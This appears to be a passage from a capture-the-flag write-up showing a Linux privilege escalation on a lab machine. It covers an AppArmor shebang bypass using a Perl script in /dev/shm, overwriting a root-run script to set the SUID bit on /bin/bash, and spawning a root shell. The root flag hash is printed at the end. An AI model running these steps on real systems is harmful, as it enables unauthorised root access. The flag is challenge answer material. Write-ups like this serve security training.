-rw-r--r--   1 root root  1724 Sep  6  2024 ubuntu_pro_apt_news
-rw-r--r--   1 root root  6853 Sep  6  2024 ubuntu_pro_esm_cache
-rw-r--r--   1 root root  3202 Feb 25  2020 usr.bin.man
-rw-r--r--   1 root root   532 Feb 12  2024 usr.sbin.ash
-rw-r--r--   1 root root   672 Feb 19  2020 usr.sbin.ippusbxd
-rw-r--r--   1 root root  2006 Jun 14  2023 usr.sbin.mysqld
-rw-r--r--   1 root root  1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r--   1 root root  1674 Feb  8  2024 usr.sbin.tcpdump

Check out relevant permissions:
cat usr.sbin.ash
OUTPUT:
#include <tunables/global>

/usr/sbin/ash flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/bash>
  #include <abstractions/consoles>
  #include <abstractions/nameservice>
  #include <abstractions/user-tmp>

  # Remove specific file path rules
  # Deny access to certain directories
  deny /opt/ r,
  deny /opt/** w,
  deny /tmp/** w,
  deny /dev/shm w,
  deny /var/tmp w,
  deny /home/** w,
  /usr/bin/** mrix,
  /usr/sbin/** mrix,

  # Simplified rule for accessing /home directory
  owner /home/** rix,
}
Note:
Following https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/apparmor#apparmor-shebang-bypass, we can write under /var/tmp, since blocking should be done in /var/tmp**
Then, we can bypass AppArmor restrictions.


Perl script to write on run_container.sh:
echo -e '#!/usr/bin/perl\nexec "/bin/sh"' > /dev/shm/test.pl


Make it executable and run:
chmod +x /dev/shm/test.pl 
/dev/shm/test.pl


Permissions before change:
id
OUTPUT:
uid=1000(think) gid=1000(think) groups=1000(think)


Execute run_container, so run_container.sh executes:
echo '#!/bin/bash\nchmod +s /bin/bash' > /opt/run_container.sh
/usr/sbin/run_container


New permissions:
ls -la /bin/bash
OUTPUT:
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash


Note:
Now that permissions on /bin/bash changed, we can spawn root shell:
/bin/bash -p
OUTPUT:
bash-5.0#




ROOT FLAG:
Check root flag:
cat /root/root.txt
3a4225cc9e85709adda6ef55d6a4f2ca  

